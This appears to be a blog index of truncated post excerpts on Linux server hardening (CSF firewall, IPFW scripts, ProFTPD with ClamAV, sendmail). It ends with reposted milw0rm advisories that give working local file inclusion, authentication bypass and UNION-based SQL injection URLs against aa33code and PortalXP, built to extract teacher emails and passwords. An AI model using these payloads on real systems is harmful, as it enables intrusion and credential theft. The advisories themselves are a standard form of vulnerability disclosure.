1.) Firewall Installation Installing firewall and various other related tools such as CSF, sim. These will prevent unauthorized access to your server and from brute force attacks. CSF (ConfigServer Firewall) http://www.configserver.com/free/csf/install.txt SIM (System Integrity Monitor) http://www.rfxnetworks.com/sim.php NSIV (Network Socket Inode Validation) http://www.rfxnetworks.com/nsiv.php LES (Linux Environment Security) http://www.rfxnetworks.com/les.php these do not prevent exploits of services which [...]

The following is a guide to installing ConfigServer Services‘ firewall and login failure daemon. Warning: The Latest version of CSF does not work properly with DirectAdmin on CentOS 5 machines with Apache 2+ CSF + LFD is a full security suite. I have provided a list of the features that I have personally tested and [...]

# Based upon Khairil Yusof rules FreeBSD IPFW example firewall script to shape traffic for your LAN and WAN network. #firewall command fwcmd=”/sbin/ipfw” #interfaces wifi=ath0 wire=fxp0 oif=tun0 vpn=tun1 internal=”10.1.1.0/24,192.168.1.0/24,192.168.3.0/24″ fw=”skipto 1000″ nat_in=”skipto 2000″ nat_out=”skipto 5000″ cs=”skipto 3000″ # Force a flushing of the current rules before we reload. $fwcmd -f flush #Setup incoming and outgoing [...]

This howto is about making ProFTPD work with CLAMAV to scan all files uploaded by users using a FTP client. Recently our customers are having real difficulty with Iframe viruses, Php shells and other kind of windows viruses are also a headache always. ClamAV is already working with exim mail server in our servers for [...]

For this demonstration, we are using Proftpd instead of the widely known and used WU-Ftpd daemon. The main reason for this is security. We will go through the follwing steps that will show you how to set up your own ftp server. Download Installation Configuring Linux for Proftpd Configuring Proftpd Some usefull insformation along the [...]

Every good server must have a good antivirus installed. Let’s install ClamAV to our machine. Paths to distributions are provided to the latest versions at the time of writting. If new version releases all you need to do is to change numbers in shell command. SSH to your server Step 1. Installing prerequisites. Clam uses [...]

how to install a mail server based on sendmail that is capable of SMTP-AUTH and TLS. It should work (maybe with slight changes concerning paths etc.) on all *nix operating systems. I tested it on Debian Woody so far. This howto is meant as a practical guide; it does not cover the theoretical backgrounds. They [...]

——————Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities—————————- # # #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # [...]

################################################################################## [+] aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ################################################################################## [+] Download : http://sourceforge.net/projects/aa33code/files/aa33code/0.0.1/aa33code-0.0.1.tar.gz/download [+] Local File Inclusion – PoC http://127.0.0.1/[path]/reviews.php?artid=../../../../../../boot.ini%00 [+] Authentication Bypass – PoC http://127.0.0.1/[path]/artedit/main.php?aa33user=admin [+] Database Configuration Disclosure – PoC http://127.0.0.1/[path]/inc/mysql.inc ################################################################################## # milw0rm.com [2009-08-01] Incoming search terms:centos LFI (3)what is the extension 1lfi [...]

############################################################################## [+] PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ##############################################################################   [+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download [+] SQL Injection – PoC’s http://127.0.0.1/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher– ########################################################################################################################################### # milw0rm.com [2009-08-01] Incoming search terms:oracle sql teacher\s edition (1)tutorial sql injection concat_ws (1)